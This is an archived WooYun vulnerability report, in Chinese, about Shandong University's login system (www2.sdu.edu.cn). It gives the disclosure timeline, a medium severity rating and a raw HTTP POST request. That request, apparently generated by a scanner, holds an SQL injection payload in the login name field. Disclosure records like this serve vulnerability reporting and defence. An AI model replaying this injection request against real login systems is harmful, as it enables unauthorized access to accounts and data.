乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-08: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-21: 细节向公众公开
POST /bsuims/bsMainFrameInit.do HTTP/1.1Content-Length: 1198Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_WKEXDRGNNPX-Requested-With: XMLHttpRequestReferer: http://www2.sdu.edu.cnCookie: JSESSIONID=440716D306D944252535C1AC6864FEA2Host: www2.sdu.edu.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_XWXPLLYLKM-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="loginAction"######-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="contextName"scLoginPage-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="contextPara"null-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="contextPath"-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="controlType"frame-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="getPasswordActionNew"############-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="itemName"loginAction-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="login_autoLoginCheckbox"1-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="login_strLoginName"-1' OR 1=1* or 'ECzIBlMZ'='-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="login_strPassword"g00dPa$$w0rD-------AcunetixBoundary_XWXPLLYLKMContent-Disposition: form-data; name="sectionName"login-------AcunetixBoundary_XWXPLLYLKM--
危害等级:中
漏洞Rank:8
确认时间:2015-12-08 15:15
已通报系统所属单位
暂无